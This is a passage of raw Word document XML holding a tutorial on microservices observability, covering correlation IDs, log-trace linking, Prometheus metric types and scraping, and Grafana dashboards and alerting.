    <w:p w14:paraId="05FE034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how each service interacts with other services in the architecture. This helps identify bottlenecks and failure points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD12B8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Hystrix</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silience4J</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) can be used to track failures and retries between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80180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99598">
          <v:rect id="_x0000_i3020" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027E9D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ng All Three Pillars for Full Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4643AB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 get a complete picture of your application, it’s important to integrat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Here’s how you can achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C0E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d-to-End Request Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42842E5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a request comes in, generate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>correlation ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or use a trace ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F19D3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details about the request in a structured format with the correlation ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729EF6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pagate the trace ID across microservices (via HTTP headers) so that each service logs the request with the same ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED1E56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key metrics related to that request and track its performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455AC0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Dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590AEB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dashboard like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for ELK stack),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for Prometheus),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to display logs, traces, and metrics in one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C04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helps to correlate logs with traces and metrics to identify root causes quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48941C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inking Logs with Traces</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515469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inspecting a trace, ensure that the logs related to that trace can be easily accessed (e.g., logs from the same correlation ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C41F9A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ilarly, when viewing logs, link them to the trace context for end-to-end visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A126930"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3CAD74">
          <v:rect id="_x0000_i3021" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A05C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B9D0E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essential for managing complex, distributed systems, especially microservices-based architectures. By effectively using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you gain insight into your system’s health and performance, making it easier to troubleshoot issues and maintain reliable services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D579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gives you deep visibility into system behavior and is essential for troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292702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llows you to track a request across multiple services, providing insights into latency and performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885477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helps you keep track of key metrics, ensuring that you can quickly detect and respond to issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C129AC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adhering to best practices in observability, you ensure your application is maintainable, scalable, and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D804F" w14:textId="098DE67B"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3022" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E6087F" w14:textId="6D08083D" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="003A1EAD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="721" w:name="_Toc197867935"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Role of Prometheus and Grafana in microservices monitoring</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="721"/>
    </w:p>
    <w:p w14:paraId="695AB62C" w14:textId="09A91348"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and Grafana are two popular tools used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring and observability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in microservices architectures. They play complementary roles in collecting, storing, and visualizing metrics to track the performance, health, and reliability of microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BB5A9"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128F0">
          <v:rect id="_x0000_i3023" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5445020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Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B235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is a powerful </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open-source monitoring and alerting toolkit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> primarily focused on </w:t>
      </w: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It is widely used to monitor microservices because of its ability to scrape, store, and query time-series data efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073719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Prometheus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB786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Series Data Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus collects time-series data through a pull-based mechanism. It scrapes metrics from exposed endpoints (e.g., /metrics in Spring Boot applications with Actuator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5EAF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ulti-dimensional Data Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus stores data with labels (key-value pairs), enabling detailed metrics segmentation, such as by service name, request type, or environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3FB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owerful Query Language (PromQL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Prometheus uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PromQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Prometheus can generate alerts based on metric thresholds. These alerts can be integrated with external systems (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alertmanager</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to trigger notifications via email, SMS, or Slack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E767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ull-based Scraping</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Prometheus Works in Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90C58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Exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each microservice exposes metrics through an endpoint (e.g., /actuator/prometheus in Spring Boot with Spring Actuator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F5D5E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raping</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus regularly scrapes metrics from these endpoints and stores them in its time-series database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B07D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Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus supports multiple types of metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0944B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unter</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monotonically increasing metric (e.g., number of requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DC00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auge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A value that can go up and down (e.g., memory usage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC921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gram</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Distributes values into buckets (e.g., request duration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDCD25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mmary</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks quantiles over a sliding time window (e.g., average response time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D718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C4F37">
          <v:rect id="_x0000_i3024" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79048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Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AEDF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Grafana is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open-source data visualization platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Grafana:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74654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ch Visualizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana offers a wide range of visualization options such as graphs, heatmaps, tables, and gauges. These help display time-series data in a clear and actionable format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DF1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Users can create </w:t>
      </w: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that show metrics relevant to different aspects of the system, such as application performance, infrastructure health, or database query times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190078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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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pport for Multiple Data Sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Grafana is not limited to Prometheus and can integrate with many other data sources like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>InfluxDB</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Elasticsearch</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ySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24206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r Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana offers role-based access control (RBAC) so that users with different levels of access can view or modify dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B63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Grafana Works in Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66264F8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Source Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana is configured to pull metrics data from Prometheus (or other sources) by setting up Prometheus as a data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C537B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eating Dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Grafana can monitor metrics over time and trigger alerts if they exceed certain thresholds (e.g., high latency or error rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A81A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Based Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana allows users to perform time-based analysis of system metrics to identify trends or anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EDECE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7A427">
          <v:rect id="_x0000_i3025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A5CA4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on of Prometheus and Grafana in Microservices Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D213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xml:space="preserve">: Each microservice exposes </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., through Spring Boot Actuator's /actuator/prometheus endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001042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crapes Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus scrapes the metrics exposed by each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208B0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tores Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus stores the scraped metrics in its time-series database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327716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 Visualization</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana fetches the stored data from Prometheus and visualizes it in user-friendly dashboards. These dashboards can display the health, performance, and resource usage of the microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA85B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The integration allows for </w:t>
      </w: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of the application and infrastructure. For example, you can monitor response times, request volumes, error rates, and system health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4DC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w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus and Grafana both support alerting, so if a metric crosses a predefined threshold (e.g., high CPU usage or increased error rates), alerts can be triggered and notifications sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154369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D16EB2">
          <v:rect id="_x0000_i3026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF1E1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Use Case Example in Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF22D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et's say you have a microservices architecture with the following services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B622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r Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736055B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rder Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C688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ventory Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870A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ill scrape the following metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472B6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est rate for each service (requests per second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD855E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ponse time for each service (average response time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965884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rror rate (5xx HTTP errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A704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ource utilization (CPU, memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52211A4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will then visualize these metrics in a dashboard. You might have separate panels for each service that show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF9AC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number of requests per second</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766DE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average response time</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quest latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081569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error rate</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., 4xx/5xx HTTP responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE40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CPU and memory usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CB2D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itionally, you can set </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
